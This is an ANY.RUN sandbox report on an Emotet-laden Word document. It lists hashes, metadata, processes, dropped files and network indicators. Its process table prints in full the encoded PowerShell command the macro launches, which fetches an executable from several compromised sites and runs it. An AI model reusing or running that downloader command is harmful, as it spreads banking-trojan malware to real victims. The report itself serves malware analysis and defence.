analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Rep-09468685US-May-22-2019.doc

Full analysis: https://app.any.run/tasks/2a29b2f1-80d4-4607-83f4-2c44b9b43b08
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 24, 2019, 16:52:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Azerbaijan Ergonomic Metal Car, Subject: Cambridgeshire, Author: Mable Bradtke, Comments: Ameliorated Peru Direct, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 22 14:11:00 2019, Last Saved Time/Date: Wed May 22 14:11:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 58, Security: 0
MD5:

43ACB347E4EEBC12E33760294B87D2A5

SHA1:

2A064CF5ADB094E7CD8001FC9DDD882AB4A18851

SHA256:

59ED5135EB63464C4124E4D29C848E489D865FFBFFEB72CF481ED18A848D8D05

SSDEEP:

3072:177HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qQyVuosKQn+of:177HUUUUUUUUUUUUUUUUUUUT52VryVuT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1656)

    • Executed via WMI

      • powershell.exe (PID: 1656)

    • PowerShell script executed

      • powershell.exe (PID: 1656)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1440)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1440)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Azerbaijan Ergonomic Metal Car
Subject: Cambridgeshire
Author: Mable Bradtke
Keywords: -
Comments: Ameliorated Peru Direct
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:22 13:11:00
ModifyDate: 2019:05:22 13:11:00
Pages: 1
Words: 10
Characters: 58
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Towne and Sons
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 67
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Champlin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1440"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Rep-09468685US-May-22-2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1656powershell -ExecutionPolicy bypass -noprofile -e JABsAFkATQBYAGIAawA4ADMAPQAnAEIATQBZADEAawBYACcAOwAkAFEAZgB2AEkAagBWAFUAagAgAD0AIAAnADgAMAA2ACcAOwAkAHEANwBYAEoATgBWAGMAPQAnAEMARABiAEgAYwA1AEwAJwA7ACQAZABZADcAcABDAHIAVwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUQBmAHYASQBqAFYAVQBqACsAJwAuAGUAeABlACcAOwAkAEEAZgBGAEcAegAwAGkAPQAnAEcANgBpAE0AaQBtACcAOwAkAFkAegA5AHEANABQAHUAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAG4ARQBUAGAALgBXAGUAQgBgAEMAYABsAEkAZQBgAE4AdAA7ACQASgBvAEwAMwBtAHQANQBKAD0AJwBoAHQAdABwADoALwAvAGIAZQB0AHQAeQBhAHoAYQByAGkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhADIAbgA3ADgAMwAyAC8AQABoAHQAdABwADoALwAvAGYAaQB0AG4AZQBzAGMAbwBvAGsALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AGgAcQBjADMANQA5ADIAOAAvAEAAaAB0AHQAcAA6AC8ALwB0AGUAbgBnAGYAZQBpAHcAYQBuAGsAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeQBxADMAZwAyADMALwBAAGgAdAB0AHAAOgAvAC8AYQBzAHAAZQBjAHQAaQB2AGUAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMgA1ADEAOAAvAEAAaAB0AHQAcAA6AC8ALwBtAGEAawBhAG4AYQBuAGsAaABhAHMAagBvAGcAeQBhAC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANwA0AHYAegAwADMALwAnAC4AcwBQAGwASQB0ACgAJwBAACcAKQA7ACQAQQBXAFAAMABCADAAcAA9ACcAUQB3ADcAdgBpAHAAaQBBACcAOwBmAG8AcgBlAGEAYwBoACgAJABpAGkAbQBaAHYAbgByADIAIABpAG4AIAAkAEoAbwBMADMAbQB0ADUASgApAHsAdAByAHkAewAkAFkAegA5AHEANABQAHUALgBEAG8AVwBOAGwAbwBBAEQAZgBpAEwARQAoACQAaQBpAG0AWgB2AG4AcgAyACwAIAAkAGQAWQA3AHAAQwByAFcAKQA7ACQAVwB0AEcAWQBtAFUAPQAnAEEAdwAyAGoAegBIACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAZABZADcAcABDAHIAVwApAC4AbABlAE4AZwB0AGgAIAAtAGcAZQAgADIAMAA2ADkAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJABkAFkANwBwAEMAcgBXACkAOwAkAHAAWQBfAGoAYQBoAF8AcAA9ACcAUwBuAFEAQQBMAHYAWQBqACcAOwBiAHIAZQBhAGsAOwAkAHcAbgBwAHoAbwBwAHcAOQA9ACcAcAB0AGwAMQB2AG4AdwBzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAdAAxAFcANABzAD0AJwBpAHcAYQBpAFYAMAAyAEoAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 533
Read events
1 063
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
1440WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREDB8.tmp.cvr
MD5:
SHA256:
1656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YH38UIWU5EHW5NVO823A.temp
MD5:
SHA256:
1656powershell.exeC:\Users\admin\806.exe
MD5:
SHA256:
1440WINWORD.EXEC:\Users\admin\~$p-09468685US-May-22-2019.docpgc
MD5:990988E39AA6B4A411EBCF8E4958B8F5
SHA256:F009D8FFF4ED227163582D2BB11C7A71FFAEB947EA73706D9DC4FA6B7EEA8AAE
1440WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\843A5E51.wmfwmf
MD5:7DA7724C9451AE668602108FB06903A7
SHA256:BC1215A106686AFD3E2AAD20AB81D3E8CF9F4F6B71802EEC27A01470C144B4DA
1656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
1440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:17222E7BED955763CB75EBDA153E0074
SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
1440WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:68337129B3E0C6DAE1597885072C3D0F
SHA256:95C99ED0AC14F88B6030F112CF699D79F396C2A206A1F4F3D6F9E9055DBFF38C
1440WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D3EC587.wmfwmf
MD5:42E4130F666B2DE96D0229A1957654C3
SHA256:62C18E0ED9873F5D2040EF3ED9091637E4E1FB8ECA36F028FF4E14C00BD9450E
1440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:3C0C63989717052C05DF9300070DE2D7
SHA256:12BDEEE6E522138360933BB809898BEDC51F81BAAA4329B8F50421C79A255FFC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1656
powershell.exe
GET
404
167.179.85.88:80
http://tengfeiwanka.com/wp-admin/yq3g23/
NZ
html
16.6 Kb
suspicious
1656
powershell.exe
GET
200
136.243.147.87:80
http://bettyazari.com/cgi-sys/suspendedpage.cgi
DE
html
7.41 Kb
suspicious
1656
powershell.exe
GET
200
104.24.96.242:80
http://aspectivesolutions.com/wp-admin/02518/
US
html
3.97 Kb
malicious
1656
powershell.exe
GET
403
145.14.144.71:80
http://makanankhasjogya.000webhostapp.com/wp-admin/74vz03/
US
html
8.25 Kb
shared
1656
powershell.exe
GET
404
165.22.78.206:80
http://fitnescook.com/wp-content/whqc35928/
US
html
178 b
unknown
1656
powershell.exe
GET
302
136.243.147.87:80
http://bettyazari.com/wp-content/a2n7832/
DE
html
593 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1656
powershell.exe
165.22.78.206:80
fitnescook.com
US
unknown
1656
powershell.exe
136.243.147.87:80
bettyazari.com
Hetzner Online GmbH
DE
suspicious
1656
powershell.exe
145.14.144.71:80
makanankhasjogya.000webhostapp.com
Hostinger International Limited
US
shared
1656
powershell.exe
104.24.96.242:80
aspectivesolutions.com
Cloudflare Inc
US
shared
1656
powershell.exe
167.179.85.88:80
tengfeiwanka.com
NZ
suspicious

DNS requests

Domain
IP
Reputation
bettyazari.com
  • 136.243.147.87
suspicious
fitnescook.com
  • 165.22.78.206
unknown
tengfeiwanka.com
  • 167.179.85.88
suspicious
aspectivesolutions.com
  • 104.24.96.242
  • 104.24.97.242
malicious
makanankhasjogya.000webhostapp.com
  • 145.14.144.71
shared

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Rep-09468685US-May-22-2019.doc